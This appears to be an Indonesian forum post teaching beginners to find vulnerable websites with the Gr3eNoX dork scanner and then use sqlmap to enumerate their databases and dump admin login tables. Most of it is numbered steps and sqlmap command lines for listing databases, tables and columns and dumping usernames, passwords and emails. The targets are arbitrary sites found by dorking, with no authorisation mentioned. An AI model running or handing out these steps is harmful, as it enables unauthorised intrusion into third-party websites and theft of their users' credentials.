Yang belum tau apa itu SQL Map silahkan disimak :v


sqlmap adalah tools opensource yang mendeteksi dan melakukan exploit pada bug SQL injection secara otomatis. dengan melakukan serangan SQL injection seorang attacker dapat mengambil alih serta memanipulasi sebuah database di dalam sebuah server.


Bahan-Bahan Yang Dibutuhkan :
1. Python.2.7 silahkan cari di google
2. Sqlmap,silahkan download di sqlmap.org
3. Gr3eNoX bisa di donlot di gugel


Kalo bahan udah disiapin langsung ikutin step dibawah ini!


1. Cari web vuln pake Gr3eNoX Caranya tinggal Masukin Dork di kolom dork yang ada diatas (kita pake hot_deals.php?id=)



2. Pages nya yang mulanya 1 diganti 5

3. Abis itu klik search, tunggu ampe kelar!

4. Kalo udah selesai, klik Remove Clones yang ada diatas,klik sekali aja!

5. Kalo targetnya udah nyusut tinggal klik Start, tunggu ampe kelar!

6. Nah yang namanya web vuln ada di kolom bagian kanan!

7. Instal Python27 dulu!

8. Kalo Udah, Ekstrak dulu sqlmap yang udah di download tadi(kalo bentuknya .zip .tar.gz dll) kalo udah di ekstrak, rename folder sqlmap menjadi "sqlmap" biar gampang

9. Copy folder sqlmap ke folder Python27 di "C/Python27"

10. Kalo Udah langsung Buka CMD ( comand prompt) 

11. Ketik "cd/Python27/sqlmap" terus enter!

12. Kalo ga berhasil berarti nama foldernya salah,coba di cek folder sqlmap yang ada di folder Python27 udah bener apa belum

13. kalo udah berhasil ntar tulisan di cmd jadi  "C:\Python27\sqlmap>" Kalo udah kek gitu langsung tulis lagi 

sqlmap.py -u (target) contoh sqlmap.py -u http://target.com/prod.php?id=2 --dbs (target bisa di ambil di kolom Gr3eNoX bagian kiri) abis itu klik enter!

14. Jika ada pilihan seperti gambar dibawah,silahkan pilih huruf yang besar(contoh [y/N] maka ketiklah "n" lalu klik enter



15. Jika sudah selesai akan ada minimal 2 database,silahkan ketik "sqlmap.py -u url target -D nama database --table(contoh sqlmap.py -u http://www.target.com/prod.php?id=2 -D admin_target --table) jangan buka database information_schema karena tidak ada yang kalian dapatkan dari situ :v
16.  Jika sudah selesai maka akan keluar beberapa tabel,pilihlah salah satu untuk dibuka dengan cara "sqlmap.py -u target -D database -T nama tabel --column" (contoh = sqlmap.py -u http://target.com/prod.php?id=2 -D admin_target -T admin_login --column")

17.  Jika sudah keluar kolomnya,silahkan di dump dengan cara "sqlmap.py -u target -D nama database -T nama tabel -C nama kolom --dump (contoh sqlmap.py -u http://target.com/prod.php?id=2 -D admin_target -T admin_login -C username,password,admin_email,admin_login --dump) setelah itu klik enter!

18.  Hasil dump sqlmap bisa diliat di C/users/sqlmap/output/[urltarget]


Kalo masih bingun bisa kontak saya di hilmiazizi19@gmail.com atau facebook.com/hilmi.azizi19 atau komen dibawah :v



Sumbef dari blog ts :
http://luckylucky19.blogspot.co.id/2...nakan-sql-?m=1